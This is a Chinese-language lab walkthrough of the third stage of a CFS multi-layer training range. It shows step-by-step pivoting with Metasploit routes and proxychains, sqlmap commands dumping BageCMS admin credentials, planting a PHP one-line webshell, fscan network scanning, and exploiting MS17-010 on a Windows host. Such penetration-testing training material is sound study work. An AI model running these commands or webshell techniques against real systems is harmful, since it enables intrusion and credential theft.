CFS靶机三层(3)

通过ifconfig信息收集，得知还有另外一张网卡

先用*msf自带的探测网络接口的模块（get_local_subnets）*和*查看路由的模块(autoroute -p)*来进一步进行信息探测

*通过**设置路由的方式把我们的请求从centos发出，这样不就可以在kali上访问到centos的ip了吗*，所以我们要来添加一个路由*(autoroute -s)*，因为我们已经在75的网段内，所以添加的路由肯定添加22网段的，

Msf代理配置

再进入 */etc/proxychains4.conf* 更改代理配置即可

在该文件的最下面一行，把ip更改为kali攻击机的ip，端口更改为刚刚配置模块的端口，更改后如下：

注意：这里使用nmap扫描要禁用ping检测，即-Pn，因为不一定能ping通）

直接扫是这样的

加上-Pn

可以看到ubuntu开放了80端口，我们挂上代理去访问

我这里用switchyomega这个插件

就可以访问了，我们其实在主机上面不配置都可以访问，因为是主机模式，但是我们模拟的是真实环境，就是需要配置代理才能访问

访问之后发现是个八哥cms3.1版本

打开源码可以看到提示是sql注入

用sqlmap直接跑

1.sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" --proxy=socks4://192.168.75.132:2222 --dbs

2.sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" --proxy=socks4://192.168.75.132:2222 -D bagecms --tables

3.sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" --proxy=socks4://192.168.75.132:2222 -D begacms -T bage_admin --columns

4.sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" --proxy=socks4://192.168.75.132:2222 -D begacms -T bage_admin -C username,password –dump

最终得到账号密码

拿去解密cmd5.com

得到账号密码之后就是爆破后台地址

扫到了个

就是第二个然后访问的时候去掉最后的星号

/index.php?r=admini

登录后观察网站，发现使用了很多模块化文件。而且都是php格式，我们直接在其中的一个php文件中加入一句话木马，再访问该文件位置，注意这里的网址使用的是模块化，不能直接加在网站上，要用?r=模块文件 的方式访问模块文件，再用蚁剑连接,注意，因为这里只是靶场，用的都是虚拟机的仅主机模式，所以蚁剑可以直接连接，平时正常情况下是不行的，需要给蚁剑配置kali一样的代理，这里是靶场就不需要了

收集信息

有另外一张网卡

生成正向木马

同样的msf新开一个页面开启监听，但是这里要注意，msf新开一个页面后之前的那个页面的所有东西都用不了，所以不能直接msfconsole打开，msf这里也需要走代理 ，就是再用proxychains msfconsole命令来启动msf，再设置payload，设置lport，设置rhost，即可开启监听

查看网络接口

发现还有33的

查看路由

老三样，先添加路由

这里我们已经处于target_2的网络下，可以直接调用模块扫描33网段

use auxiliary/scanner/portscan/tcp

show options

set RHOSTS 192.168.33.0/24

exploit

上传fscan ,

Chmod +x fscan

./fscanc –h 192.168.33.0/24 –o 1.txt

Cat 1.txt

可以看到192.168.33.33有永恒之蓝漏洞

调用ms17-010模块攻击

use exploit/windows/smb/ms17_010_psexec

set payload windows/x64/meterpreter/bind_tcp //设置正向连接

show options //设置 set RHOST 192.168.33.33

exploit

成功拿下第三层windows靶机